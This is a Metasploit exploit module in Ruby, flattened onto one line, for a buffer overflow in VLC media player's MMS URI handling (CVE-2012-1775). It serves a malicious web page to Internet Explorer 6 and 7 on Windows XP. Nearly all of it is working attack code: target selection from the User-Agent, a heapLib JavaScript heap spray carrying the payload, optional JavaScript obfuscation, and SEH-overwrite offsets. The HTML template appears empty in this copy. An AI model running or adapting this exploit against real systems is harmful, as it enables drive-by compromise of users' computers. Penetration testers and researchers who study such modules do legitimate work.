## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "VLC MMS Stream Handling Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in VLC media player VLC media player prior to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result in a stack buffer overflow when handling a malicious MMS URI. This module uses the browser as attack vector. A specially crafted MMS URI is used to trigger the overflow and get flow control through SEH overwrite. Control is transferred to code located in the heap through a standard heap spray. The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided. }, 'License' => MSF_LICENSE, 'Author' => [ 'Florent Hochwelker', # aka TaPiOn, Vulnerability discovery 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2012-1775'], ['OSVDB', '80188'], ['URL', 'http://www.videolan.org/security/sa1201.html'], # Fix commit diff ['URL', 'http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c'] ], 'Payload' => { 'BadChars' => "\x00", 'Space' => 1000, }, 'DefaultOptions' => { 'ExitFunction' => "process", 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ # Tested with VLC 2.0.0 [ 'Automatic', {} ], [ 'Internet Explorer 6 on XP SP3', { 'Rop' => false, # Space needed to overflow and generate an exception # which allows to get control through SEH overwrite 'Offset' => 5488, 'OffsetShell' => '0x800 - code.length', 'Blocks' => '1550', 'Padding' => '0' } ], [ 'Internet Explorer 7 on XP SP3', { 'Rop' => false, # Space needed to overflow and generate an exception # which allows to get control through SEH overwrite 'Offset' => 5488, 'OffsetShell' => '0x800 - code.length', 'Blocks' => '1600', 'Padding' => '1' } ] ], 'DisclosureDate' => "Mar 15 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']) ], self.class) end def get_target(cli, request) #Default target my_target = target vprint_status("User-Agent: #{request.headers['User-Agent']}") if target.name == 'Automatic' agent = request.headers['User-Agent'] if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ #Windows XP + IE 6 my_target = targets[1] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/ #Windows XP + 7.0 my_target = targets[2] else #If we don't recognize the client, we don't fire the exploit my_target = nil end end return my_target end def on_request_uri(cli, request) #Pick the right target my_target = get_target(cli, request) if my_target.nil? vprint_error("Target not supported") send_not_found(cli) return end vprint_status("URL: #{request.uri.to_s}") #ARCH used by the victim machine arch = Rex::Arch.endian(my_target.arch) nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch) code = Rex::Text.to_unescape(payload.encoded, arch) # Spray overwrites 0x30303030 with our payload spray = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{code}"); var nops = unescape("#{nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['OffsetShell']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=0; i < #{my_target['Blocks']}; i++) { heap_obj.alloc(block); } JS #Use heaplib js_spray = heaplib(spray) #obfuscate on demand if datastore['OBFUSCATE'] js_spray = ::Rex::Exploitation::JSObfu.new(js_spray) js_spray.obfuscate end src_ip = Rex::Socket.source_address.split('.') hex_ip = src_ip.map { |h| [h.to_i].pack('C*')[0].unpack('H*')[0] }.join # Try to maximize success on IE7 platform: # If first octet of IP address is minor than 16 pad with zero # even when heap spray could be not successful. # Else pad following target heap spray criteria. if ((hex_ip.to_i(16) >> 24) < 16) padding_char = '0' else padding_char = my_target['Padding'] end hex_ip = "0x#{padding_char * my_target['Offset']}#{hex_ip}" html = <<-EOS EOS #Remove extra tabs in HTML html = html.gsub(/^\t\t/, "") print_status("Sending malicious page") send_response( cli, html, {'Content-Type' => 'text/html'} ) end end